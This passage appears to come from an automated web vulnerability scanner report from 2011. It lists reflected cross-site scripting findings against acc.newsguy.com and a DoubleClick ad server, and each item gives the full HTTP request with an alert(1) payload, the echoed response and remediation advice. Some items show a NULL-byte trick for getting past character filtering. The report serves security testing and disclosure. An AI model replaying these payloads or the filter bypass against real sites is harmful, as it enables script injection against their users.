POST /cgi-bin/sub_form?1 HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/cgi-bin/sub_form
Content-Length: 70
Cache-Control: max-age=0
Origin: https://acc.newsguy.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

product=11117&adult_access=yes&iaccess=f3fb47"><script>alert(1)</script>89203b485c9&refer=&submit.x=23&submit.y=5

Response

HTTP/1.1 200 OK
Date: Tue, 02 Aug 2011 11:23:23 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 28270


<head>
<title>Newsguy - Open a Newsgroup Account</title>
<meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space,
software, archives, art & music galleries, feature c
...[SNIP]...
<input type="hidden" name="iaccess" value="f3fb47"><script>alert(1)</script>89203b485c9">
...[SNIP]...

2.3. https://acc.newsguy.com/cgi-bin/sub_form [product parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/sub_form

Issue detail

The value of the product request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 599c1"><script>alert(1)</script>7b6ecef1952 was submitted in the product parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /cgi-bin/sub_form?1 HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/cgi-bin/sub_form
Content-Length: 70
Cache-Control: max-age=0
Origin: https://acc.newsguy.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

product=11117599c1"><script>alert(1)</script>7b6ecef1952&adult_access=yes&iaccess=f&refer=&submit.x=23&submit.y=5

Response

HTTP/1.1 200 OK
Date: Tue, 02 Aug 2011 11:23:16 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 28270


<head>
<title>Newsguy - Open a Newsgroup Account</title>
<meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space,
software, archives, art & music galleries, feature c
...[SNIP]...
<input type="hidden" name="product" value="11117599c1"><script>alert(1)</script>7b6ecef1952">
...[SNIP]...

2.4. https://acc.newsguy.com/cgi-bin/sub_form [refer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/sub_form

Issue detail

The value of the refer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b17fb"><script>alert(1)</script>87b0527d55f was submitted in the refer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /cgi-bin/sub_form?1 HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/cgi-bin/sub_form
Content-Length: 70
Cache-Control: max-age=0
Origin: https://acc.newsguy.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

product=11117&adult_access=yes&iaccess=f&refer=b17fb"><script>alert(1)</script>87b0527d55f&submit.x=23&submit.y=5

Response

HTTP/1.1 200 OK
Date: Tue, 02 Aug 2011 11:23:26 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 28270


<head>
<title>Newsguy - Open a Newsgroup Account</title>
<meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space,
software, archives, art & music galleries, feature c
...[SNIP]...
<input type="hidden" name="refer" value="b17fb"><script>alert(1)</script>87b0527d55f">
...[SNIP]...

2.5. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1881.msn/B5322276.44

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe518"-alert(1)-"940200817b0 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1881.msn/B5322276.44;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843fe518"-alert(1)-"940200817b0&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=;ord=1898580505? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Date: Wed, 03 Aug 2011 13:12:57 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2362466/300x250-home-free.png";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843fe518"-alert(1)-"940200817b0&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307
...[SNIP]...

2.6. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1881.msn/B5322276.44

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3c08'-alert(1)-'694d2b5e093 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1881.msn/B5322276.44;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843e3c08'-alert(1)-'694d2b5e093&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=;ord=1898580505? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Date: Wed, 03 Aug 2011 13:13:02 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843e3c08'-alert(1)-'694d2b5e093&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307
...[SNIP]...

2.7. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1881.msn/B5322276.44

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58fdc"-alert(1)-"a25eb4d0da was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1881.msn/B5322276.44;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=189858050558fdc"-alert(1)-"a25eb4d0da&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=;ord=1898580505? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6289
Date: Wed, 03 Aug 2011 13:13:28 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
inV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=189858050558fdc"-alert(1)-"a25eb4d0da&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dc/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7
...[SNIP]...

2.8. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1881.msn/B5322276.44

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66c23'-alert(1)-'8ecd3b658ad was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1881.msn/B5322276.44;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=189858050566c23'-alert(1)-'8ecd3b658ad&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=;ord=1898580505? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Date: Wed, 03 Aug 2011 13:13:34 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=189858050566c23'-alert(1)-'8ecd3b658ad&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7
...[SNIP]...

2.9. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1881.msn/B5322276.44

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ea4b'-alert(1)-'20c252c7b3 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1881.msn/B5322276.44;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f9ea4b'-alert(1)-'20c252c7b3&destination=;ord=1898580505? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6289
Date: Wed, 03 Aug 2011 13:13:59 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f9ea4b'-alert(1)-'20c252c7b3&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dc/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3fhttp://www.morethan.com/Pages/Product
...[SNIP]...

2.10. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1881.msn/B5322276.44

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a943d"-alert(1)-"51f858c998 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1881.msn/B5322276.44;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68fa943d"-alert(1)-"51f858c998&destination=;ord=1898580505? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6289
Date: Wed, 03 Aug 2011 13:13:54 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
;
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68fa943d"-alert(1)-"51f858c998&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dc/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3fhttp://www.morethan.com/Pages/Product
...[SNIP]...

2.11. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1881.msn/B5322276.44

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00a4bc4'-alert(1)-'19ce244ece3 was submitted in the PG parameter. This input was echoed as a4bc4'-alert(1)-'19ce244ece3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/N1881.msn/B5322276.44;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO%00a4bc4'-alert(1)-'19ce244ece3&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=;ord=1898580505? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6305
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 03 Aug 2011 13:13:49 GMT
Expires: Wed, 03 Aug 2011 13:13:49 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO%00a4bc4'-alert(1)-'19ce244ece3&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/e0/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3
...[SNIP]...

2.12. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1881.msn/B5322276.44

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00fc8ce"-alert(1)-"05ecbe75c42 was submitted in the PG parameter. This input was echoed as fc8ce"-alert(1)-"05ecbe75c42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/N1881.msn/B5322276.44;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO%00fc8ce"-alert(1)-"05ecbe75c42&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=;ord=1898580505? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6305
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 03 Aug 2011 13:13:41 GMT
Expires: Wed, 03 Aug 2011 13:13:41 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO%00fc8ce"-alert(1)-"05ecbe75c42&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/e0/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3
...[SNIP]...

2.13. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1881.msn/B5322276.44

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9382f'-alert(1)-'79b3021c1ab was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1881.msn/B5322276.44;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=532360819382f'-alert(1)-'79b3021c1ab&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=;ord=1898580505? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Date: Wed, 03 Aug 2011 13:13:23 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=532360819382f'-alert(1)-'79b3021c1ab&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/4080
...[SNIP]...

2.14. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1881.msn/B5322276.44

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ada41"-alert(1)-"0e77f79419f was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1881.msn/B5322276.44;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081ada41"-alert(1)-"0e77f79419f&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=;ord=1898580505? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Date: Wed, 03 Aug 2011 13:13:18 GMT

